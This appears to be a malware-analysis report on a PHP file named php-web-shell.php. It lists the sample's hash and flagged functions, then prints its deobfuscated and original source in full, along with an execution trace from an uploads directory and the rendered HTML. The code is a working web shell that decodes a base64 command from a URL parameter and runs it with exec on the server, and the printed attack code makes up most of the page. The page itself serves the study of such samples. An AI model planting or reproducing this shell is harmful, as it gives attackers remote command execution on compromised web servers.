php-web-shell.php

md5: 886796ee7ad434716f2a7d0f584decf4

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Deobfuscated, Original, Traces)

Execution
exec (Deobfuscated, Original)

Input
_GET (Deobfuscated, Original)

Title
PHP Web Shell (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<title>PHP Web Shell</title>
<html>
<body>
    <!-- Replaces command with Base64-encoded Data -->
    <script>
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    </script>
    
    <!-- HTML Form for inputting desired command -->
    <form id="execute_form" autocomplete="off">
        <b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />
        <input type="submit" value="Execute" />
    </form>
    
    <!-- PHP code that executes command and outputs cleanly -->
    <?php 
$decoded_command = base64_decode($_GET['id']);
echo "<b>Executed:</b>  {$decoded_command}";
echo str_repeat("<br>", 2);
echo "<b>Output:</b>";
echo str_repeat("<br>", 2);
exec($decoded_command . " 2>&1", $output, $return_status);
if (isset($return_status)) {
    if ($return_status !== 0) {
        echo "<font color='red'>Error in Code Execution -->  </font>";
        foreach ($output as &$line) {
            echo "{$line} <br>";
        }
    } elseif ($return_status == 0 && empty($output)) {
        echo "<font color='green'>Command ran successfully, but does not have any output.</font>";
    } else {
        foreach ($output as &$line) {
            echo "{$line} <br>";
        }
    }
}
?>
</body>
</html>
Execution traces
data/traces/886796ee7ad434716f2a7d0f584decf4_trace-1676262474.8486.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:28:20.746435]
1	0	1	0.000153	393576
1	3	0	0.000229	398320	{main}	1		/var/www/html/uploads/php-web-shell.php	0	0
2	4	0	0.000263	398320	base64_decode	0		/var/www/html/uploads/php-web-shell.php	22	1	NULL
2	4	1	0.000279	398384
2	4	R			''
1		A						/var/www/html/uploads/php-web-shell.php	22	$decoded_command = ''
2	5	0	0.000306	398352	str_repeat	0		/var/www/html/uploads/php-web-shell.php	24	2	'<br>'	2
2	5	1	0.000320	398456
2	5	R			'<br><br>'
2	6	0	0.000335	398352	str_repeat	0		/var/www/html/uploads/php-web-shell.php	26	2	'<br>'	2
2	6	1	0.000348	398456
2	6	R			'<br><br>'
2	7	0	0.000361	398400	exec	0		/var/www/html/uploads/php-web-shell.php	27	3	' 2>&1'	NULL	NULL
2	7	1	0.001086	398560
2	7	R			''
1	3	1	0.001109	398456
			0.001137	314512
TRACE END   [2023-02-13 02:28:20.747450]

Generated HTML code
<html><head><title>PHP Web Shell</title>

</head><body>
    <!-- Replaces command with Base64-encoded Data -->
    <script>
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    </script>
    
    <!-- HTML Form for inputting desired command -->
    <form id="execute_form" autocomplete="off">
        <b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px">
        <input type="submit" value="Execute">
    </form>
    
    <!-- PHP code that executes command and outputs cleanly -->
    <b>Executed:</b>  <br><br><b>Output:</b><br><br><font color="green">Command ran successfully, but does not have any output.</font>

</body></html>
Original PHP code
<title>PHP Web Shell</title>
<html>
<body>
    <!-- Replaces command with Base64-encoded Data -->
    <script>
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    </script>
    
    <!-- HTML Form for inputting desired command -->
    <form id="execute_form" autocomplete="off">
        <b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />
        <input type="submit" value="Execute" />
    </form>
    
    <!-- PHP code that executes command and outputs cleanly -->
    <?php
        $decoded_command = base64_decode($_GET['id']);
        echo "<b>Executed:</b>  $decoded_command";
        echo str_repeat("<br>",2);
        echo "<b>Output:</b>";
        echo str_repeat("<br>",2);
        exec($decoded_command . " 2>&1", $output, $return_status);
        if (isset($return_status)):
            if ($return_status !== 0):
                echo "<font color='red'>Error in Code Execution -->  </font>";
                foreach ($output as &$line) {
                    echo "$line <br>";
                };
            elseif ($return_status == 0 && empty($output)):
                echo "<font color='green'>Command ran successfully, but does not have any output.</font>";
            else:
                foreach ($output as &$line) {
                    echo "$line <br>";
                };
            endif;
        endif;
    ?>
</body>
</html>
PHP Malware Analysis

php-web-shell.php

md5: 886796ee7ad434716f2a7d0f584decf4

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
